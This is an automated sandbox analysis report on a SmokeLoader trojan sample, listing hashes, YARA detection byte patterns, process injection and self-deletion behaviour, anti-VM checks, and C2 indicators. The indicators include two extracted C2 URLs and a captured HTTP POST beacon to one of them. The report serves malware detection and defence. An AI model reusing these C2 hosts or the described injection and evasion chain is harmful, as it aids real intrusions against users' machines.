Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	764039
MD5:	0d810e582a95debff5e1a72a76c602c9
SHA1:	486a963c02b9e7d5ecc2941c4dcb7f589954d7d7
SHA256:	c57cafedd2e4617e24315cde0de7a6393610fb924e8bd4d3561ee3c4b2d90372
Tags:	exe
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Injects a PE file into a foreign processes

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Contains functionality to inject code into remote processes

Deletes itself after installation

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Checks if the current machine is a virtual machine (disk enumeration)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

file.exe (PID: 5164 cmdline: C:\Users\user\Desktop\file.exe MD5: 0D810E582A95DEBFF5E1A72A76C602C9)

file.exe (PID: 6088 cmdline: C:\Users\user\Desktop\file.exe MD5: 0D810E582A95DEBFF5E1A72A76C602C9)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

rudwagu (PID: 5400 cmdline: C:\Users\user\AppData\Roaming\rudwagu MD5: 0D810E582A95DEBFF5E1A72A76C602C9)

rudwagu (PID: 1324 cmdline: C:\Users\user\AppData\Roaming\rudwagu MD5: 0D810E582A95DEBFF5E1A72A76C602C9)

cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000A.00000002.397674421.0000000000722000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7c8b:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.248700871.0000000000573000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7733:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.file.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
11.2.rudwagu.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
11.0.rudwagu.400000.5.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
10.2.rudwagu.6e15a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
11.0.rudwagu.400000.6.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
11.0.rudwagu.400000.4.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0.2.file.exe.8e15a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
Click to see the 2 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://host-host-file8.com/

URL Reputation: Label: malware

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\rudwagu

Joe Sandbox ML: detected

Source: 11.0.rudwagu.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.0.rudwagu.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.0.rudwagu.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.0.rudwagu.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: C:\bicudo_cikiro\wuwud\cen26\rimitibifaru.pdb source: file.exe, rudwagu.2.dr
Source:	Binary string: ZC:\bicudo_cikiro\wuwud\cen26\rimitibifaru.pdb source: file.exe, rudwagu.2.dr

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: host-file-host6.com
Source: C:\Windows\explorer.exe	Domain query: host-host-file8.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://host-file-host6.com/
Source: Malware configuration extractor	URLs: http://host-host-file8.com/

Source: Joe Sandbox View

ASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE

Source: Joe Sandbox View

IP Address: 84.21.172.159 84.21.172.159

Source: global traffic

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhsselotxu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: host-file-host6.com

Source: explorer.exe, 00000002.00000000.299803671.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.329320639.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.259861471.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: http://www.autoitscript.com/autoit3/J

Source: unknown

DNS traffic detected: queries for: host-file-host6.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rudwagu.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.rudwagu.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rudwagu.6e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.rudwagu.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.rudwagu.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.8e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000002.397674421.0000000000722000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.248700871.0000000000573000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000A.00000002.397674421.0000000000722000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.248700871.0000000000573000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004148D1	0_2_004148D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00413C95	0_2_00413C95
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040CD0A	0_2_0040CD0A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004141D9	0_2_004141D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00415632	0_2_00415632
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00413751	0_2_00413751
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407BA1	0_2_00407BA1

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00408168 appears 45 times

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,	0_2_008E0110
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040180C Sleep,NtTerminateProcess,	1_2_0040180C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00401818 Sleep,NtTerminateProcess,	1_2_00401818
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00401822 Sleep,NtTerminateProcess,	1_2_00401822
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00401826 Sleep,NtTerminateProcess,	1_2_00401826
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00401834 Sleep,NtTerminateProcess,	1_2_00401834
Source: C:\Users\user\AppData\Roaming\rudwagu	Code function: 11_2_0040180C Sleep,NtTerminateProcess,	11_2_0040180C
Source: C:\Users\user\AppData\Roaming\rudwagu	Code function: 11_2_00401818 Sleep,NtTerminateProcess,	11_2_00401818
Source: C:\Users\user\AppData\Roaming\rudwagu	Code function: 11_2_00401822 Sleep,NtTerminateProcess,	11_2_00401822
Source: C:\Users\user\AppData\Roaming\rudwagu	Code function: 11_2_00401826 Sleep,NtTerminateProcess,	11_2_00401826
Source: C:\Users\user\AppData\Roaming\rudwagu	Code function: 11_2_00401834 Sleep,NtTerminateProcess,	11_2_00401834

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\rudwagu C:\Users\user\AppData\Roaming\rudwagu
Source: C:\Users\user\AppData\Roaming\rudwagu	Process created: C:\Users\user\AppData\Roaming\rudwagu C:\Users\user\AppData\Roaming\rudwagu
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rudwagu	Process created: C:\Users\user\AppData\Roaming\rudwagu C:\Users\user\AppData\Roaming\rudwagu	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\rudwagu

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/2@4/1

Source: C:\Users\user\AppData\Roaming\rudwagu

Code function: 10_2_00729CB9 CreateToolhelp32Snapshot,Module32First,

10_2_00729CB9

Source: C:\Users\user\Desktop\file.exe	Command line argument: _.K>	0_2_004058A1
Source: C:\Users\user\Desktop\file.exe	Command line argument: Cgx	0_2_004058A1
Source: C:\Users\user\Desktop\file.exe	Command line argument: tf71	0_2_004058A1
Source: C:\Users\user\Desktop\file.exe	Command line argument: yLmc	0_2_004058A1
Source: C:\Users\user\Desktop\file.exe	Command line argument: /fY.	0_2_004058A1
Source: C:\Users\user\Desktop\file.exe	Command line argument: NKR[	0_2_004058A1
Source: C:\Users\user\Desktop\file.exe	Command line argument: mf:	0_2_004058A1
Source: C:\Users\user\Desktop\file.exe	Command line argument: 5[$'	0_2_004058A1
Source: C:\Users\user\Desktop\file.exe	Command line argument: ]q0r	0_2_004058A1
Source: C:\Users\user\Desktop\file.exe	Command line argument: EuY	0_2_004058A1
Source: C:\Users\user\Desktop\file.exe	Command line argument: +F28	0_2_004058A1
Source: C:\Users\user\Desktop\file.exe	Command line argument: eVS	0_2_004058A1
Source: C:\Users\user\Desktop\file.exe	Command line argument: pumitafoto	0_2_004058A1
Source: C:\Users\user\Desktop\file.exe	Command line argument: msimg32.dll	0_2_004058A1
Source: C:\Users\user\Desktop\file.exe	Command line argument: 0.txt	0_2_004058A1
Source: C:\Users\user\Desktop\file.exe	Command line argument: kernel32.dll	0_2_004058A1

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\bicudo_cikiro\wuwud\cen26\rimitibifaru.pdb source: file.exe, rudwagu.2.dr
Source:	Binary string: ZC:\bicudo_cikiro\wuwud\cen26\rimitibifaru.pdb source: file.exe, rudwagu.2.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004081AD push ecx; ret	0_2_004081C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E198B push ebx; iretd	0_2_008E19B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E1977 push ebx; iretd	0_2_008E19B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E1970 push ebx; iretd	0_2_008E19B7
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004011D0 push ebx; iretd	1_2_00401217
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004011D7 push ebx; iretd	1_2_00401217
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004011EB push ebx; iretd	1_2_00401217
Source: C:\Users\user\AppData\Roaming\rudwagu	Code function: 10_2_0072FA58 pushad ; iretd	10_2_0072FA5E
Source: C:\Users\user\AppData\Roaming\rudwagu	Code function: 10_2_0072ABCC push ebx; iretd	10_2_0072ABF7
Source: C:\Users\user\AppData\Roaming\rudwagu	Code function: 10_2_0072ABB7 push ebx; iretd	10_2_0072ABF7
Source: C:\Users\user\AppData\Roaming\rudwagu	Code function: 11_2_004011D0 push ebx; iretd	11_2_00401217
Source: C:\Users\user\AppData\Roaming\rudwagu	Code function: 11_2_004011D7 push ebx; iretd	11_2_00401217
Source: C:\Users\user\AppData\Roaming\rudwagu	Code function: 11_2_004011EB push ebx; iretd	11_2_00401217

Source: file.exe	Static PE information: section name: .lokeris
Source: file.exe	Static PE information: section name: .zoyan
Source: rudwagu.2.dr	Static PE information: section name: .lokeris
Source: rudwagu.2.dr	Static PE information: section name: .zoyan

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040DAD4 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

0_2_0040DAD4

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\rudwagu

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\rudwagu

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\rudwagu:Zone.Identifier read attributes | delete

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: rudwagu, 0000000B.00000002.408364797.00000000004DB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOKC

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rudwagu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rudwagu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rudwagu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rudwagu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rudwagu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rudwagu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Source: C:\Windows\explorer.exe TID: 4720	Thread sleep count: 649 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2216	Thread sleep count: 338 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2216	Thread sleep time: -33800s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4784	Thread sleep count: 384 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4784	Thread sleep time: -38400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1272	Thread sleep count: 527 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1284	Thread sleep count: 207 > 30	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_0-8853

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 649	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 384	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 527	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: explorer.exe, 00000002.00000000.288891686.000000000F5F1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.331858237.00000000045B0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.317840368.00000000081DD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
